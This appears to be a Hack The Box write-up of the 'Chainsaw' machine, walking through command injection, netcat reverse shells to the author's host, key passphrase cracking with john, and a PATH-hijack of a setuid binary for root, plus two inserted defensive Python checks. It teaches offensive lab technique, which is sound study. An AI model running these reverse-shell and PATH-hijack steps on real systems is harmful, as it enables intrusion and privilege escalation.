Chainsaw — HacktheBox – sif0



Since I am able to execute a ping, and it seems like it’s being passed to bash, I can add a ‘&’ and append a malicious command like:

nc -e /bin/sh 10.10.14.72 9003

Running that line in the Python interpreter:

I then get a reverse shell as the user administrator, and appropriately spawn a tty using Python:

Note that the address changes every time the machine boots. Just connect to the FTP server and download the address.txt file from it.

administrator → bobby

Checking user directories under /home, I see 2 users called administrator and bobby. Note that I don’t have read access on the bobby directory:

Checking what’s under the directory of administrator, I see a chainsaw-emp.csv file. I transfer it to my machine by using cat and piping its output to nc (netcat). I then check the integrity of the file:

Opening chainsaw-emp.csv:

Employees,Active,Position
arti@chainsaw,No,Network Engineer
bryan@chainsaw,No,Java Developer
bobby@chainsaw,Yes,Smart Contract Auditor
lara@chainsaw,No,Social Media Manager
wendy@chainsaw,No,Mobile Application Developer

I see a list of possible usernames and their position. I then try reading /etc/passwd to gain more information about the users:

It seems that the default shell for arti, lara, bryan, and wendy is /bin/false, which basically means that they don’t get a shell when they log in. Note also that their home directories are non-existent, since only the administrator and bobby directories are under /home. Bobby has /bin/bash as his default shell.

I see that there is a gen.py file and a directory called pub:

administrator@chainsaw:/home/administrator/maintain$ cat gen.py
#!/usr/bin/python
from Crypto.PublicKey import RSA
from os import chmod
import getpass

def generate(username, password):
    # Generate a 2048-bit RSA key pair
    key = RSA.generate(2048)
    pubkey = key.publickey()
    pub = pubkey.exportKey('OpenSSH')
    # Private key in legacy PKCS#1 PEM, encrypted with the given passphrase
    priv = key.exportKey('PEM', password, pkcs=1)
    filename = "{}.key".format(username)
    with open(filename, 'w') as file:
        chmod(filename, 0600)
        file.write(priv)
        file.close()
    with open("{}.pub".format(filename), 'w') as file:
        file.write(pub)
        file.close()
# TODO: Distribute keys via ProtonMail

if __name__ == "__main__":
    while True:
        username = raw_input("User: ")
        password = getpass.getpass()
        generate(username, password)

It seems that gen.py just generates a private and public key. Note that there is a TODO which says to distribute keys via ProtonMail.

Checking the directory pub, I see existing public keys for the mentioned users, but not private keys.

What’s interesting is the /.ipfs folder under the administrator directory. IPFS stands for interplanetary file system. You can learn more about it from these resources: https://ipfs.io/ and https://flyingzumwalt.gitbooks.io/decentralized-web-primer/install-ipfs/lessons/initialize-repository.html

Since there may be files under this directory, I run grep to check for any files that mention bobby (since keys are to be distributed).

grep -r bobby .

Note that there is an interesting line where a filename of bobby.key.enc is mentioned. I used cat to read the file:

I can see that it’s a message from the IT department to bobby regarding his Ubuntu Server Private RSA key. Checking the contents:

It seems like it’s base64 encoded. I decode it and save the file to bobby.key.decoded:

Since it is an encrypted private key, I can use ssh2john to convert it to a crackable format for john:

I then use john to crack the password for the private key:

john --wordlist=/usr/share/wordlists/rockyou.txt bobby.key.john

John then cracks the private key and finds that it uses the password jackychain.
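As an added example (not code from the box or from this write-up), a small inspector for a base64-wrapped PEM key like bobby.key.enc: it reports whether the key is passphrase-protected and whether it uses the legacy PKCS#1 PEM encryption that gen.py’s exportKey('PEM', password, pkcs=1) produces, which derives the cipher key with a single MD5 pass and therefore cracks quickly with john. The sample key below is constructed; its body is placeholder data and only the headers are inspected.

```python
import base64
import re

# Constructed sample: headers of a legacy PKCS#1 PEM key encrypted with a
# passphrase, as PyCrypto's exportKey('PEM', password, pkcs=1) writes them.
# The body is placeholder data, not a real key; only the headers are parsed.
SAMPLE_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----
"""
# The same material base64-wrapped, the way bobby.key.enc was stored in IPFS.
SAMPLE_B64 = base64.b64encode(SAMPLE_PEM.encode()).decode()


def inspect_pem_key(text):
    """Return what a defender wants to know about a PEM private key blob."""
    m = re.search(r"-----BEGIN ([A-Z ]+)-----\n(.*?)-----END \1-----", text, re.S)
    if not m:
        return {"pem": False}
    label, body = m.group(1), m.group(2)
    headers = {}
    lines = body.splitlines()
    i = 0
    # RFC 1421-style headers precede the base64 body; base64 never contains ':'
    while i < len(lines) and ":" in lines[i]:
        k, v = lines[i].split(":", 1)
        headers[k.strip()] = v.strip()
        i += 1
    encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
    cipher = headers.get("DEK-Info", "").split(",")[0] or None
    return {
        "pem": True,
        "label": label,
        "encrypted": encrypted,
        "cipher": cipher,
        # Legacy "RSA PRIVATE KEY" + DEK-Info encryption uses one MD5 pass and
        # no iteration count, so offline passphrase guessing is cheap.
        "legacy_kdf": encrypted and label == "RSA PRIVATE KEY",
    }


def inspect_base64_blob(b64):
    """Decode a base64-wrapped key (as found in the IPFS store) and inspect it."""
    return inspect_pem_key(base64.b64decode(b64).decode())
```

A key that reports legacy_kdf should be regenerated in a modern format (OpenSSH or PKCS#8 with a KDF iteration count) rather than relying on the passphrase alone.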

I then try to login using the private key, using the password jackychain:

And I successfully login and now I can read user.txt

bobby@chainsaw:~$ cat user.txt 
af8d9df99....

bobby → root

Checking for files under the bobby directory, I see a binary called ChainsawClub that has its setuid bit set and another set of json and sol files.

I try to execute the binary:

It asks for a username:

After trying the username test with the password test, it doesn’t work. What I did was simply follow the flow of the binary.

Reading ChainsawClub.sol:

It has a string username set to nobody and a password, which looks like a hash. I check the functions, and it’s more complicated than the json and sol files I had from the initial step (from the FTP).

I also run strings on ChainsawClub binary:

There is an interesting line from the output.

sudo -i -u root /root/ChainsawClub/dist/ChainsawClub/ChainsawClub

This is unsafe, as I can create a file called “sudo” and add its directory to the PATH variable: when I run the ChainsawClub binary and it calls sudo, the shell searches the PATH entries from left to right for any binary called sudo. Checking the PATH using env:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

I first include the working directory to the PATH:

export PATH=.:$PATH

Checking the modified PATH through the env command:

PATH=.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

Notice that the PATH was prepended with “.”

I then set up tcpdump to listen for ICMP packets on the interface tun0, and run the binary ChainsawClub:

Notice that I get a ping to my machine. I then check if nc (netcat) is installed on the machine, and try to get a reverse shell just to check whether I am able to:

Since I am able to get a connection as the user bobby, I then edit the contents of the “sudo” file to:

#!/bin/bash
nc -e /bin/sh 10.10.14.72 9001

Now when I run the ChainsawClub binary and it calls “sudo”, rather than calling /usr/bin/sudo, it calls the sudo in the current directory.

And now I get a shell. When I run the command id, I see that my uid=0(root).
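As an added example (not code from the box or from this write-up), a Python check that captures the weakness the privileged binary relies on: which PATH entries let an unprivileged user shadow sudo, which file a shell would actually resolve for it, and whether an invocation is immune because it names the command by absolute path. The filesystem view and the set of user-writable directories are constructed for the example.

```python
import os

# Constructed view of the filesystem: directories that hold a file named
# `sudo`. It stands in for os.stat() so the example runs offline.
SAMPLE_FS = {
    "/usr/bin/sudo": {"mode": 0o4755, "setuid": True},
    "./sudo": {"mode": 0o755, "setuid": False},  # user-created file in the cwd
}
# Constructed: directories the unprivileged user can write to.
WRITABLE_DIRS = {".", "/tmp", "/home/bobby"}

# The PATH observed on the box before and after prepending "."
BOX_PATH = ("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:"
            "/usr/games:/usr/local/games:/snap/bin")


def audit_path(path_value, writable_dirs=WRITABLE_DIRS):
    """Flag PATH entries that let a caller substitute a binary of their own."""
    findings = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            findings.append((entry or "<empty>", "resolves to the current directory"))
        elif not entry.startswith("/"):
            findings.append((entry, "relative entry"))
        elif entry in writable_dirs:
            findings.append((entry, "writable by the unprivileged user"))
    return findings


def resolve_command(name, path_value, fs=SAMPLE_FS):
    """Return the file a shell would execute for `name` under this PATH."""
    for entry in path_value.split(":"):
        candidate = os.path.join(entry or ".", name)
        if candidate in fs:
            return candidate
    return None


def invocation_is_hardened(cmdline):
    """True when the command word is an absolute path, so PATH plays no role.

    The fix for the line found in ChainsawClub is exactly this: call
    /usr/bin/sudo, not sudo, and reset PATH before doing so.
    """
    return cmdline.split()[0].startswith("/")
```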

When I read root.txt, its contents are not the root flag:

root@chainsaw:/root# cat root.txt
Mine deeper to get rewarded with root coin (RTC)...

Extra challenge:

Since I am root but still do not have the root flag, I looked for ways to find it. I first set up a proper shell:

I then looked for interesting binaries that could hint at what should be done. After a while, I was able to find the root flag by using bmap in slack mode to read the root flag. You can read more about it here: https://www.security-box.org/article35/slack-space-hiding

So that’s how I solved Chainsaw from Hack the Box. I learned tons of stuff solving this box, and the techniques required were very new to me (interaction with an Ethereum client, IPFS, and bmap slack space hiding).

I hope you learned something from this. Thanks for reading my write-up! Cheers! 🍺
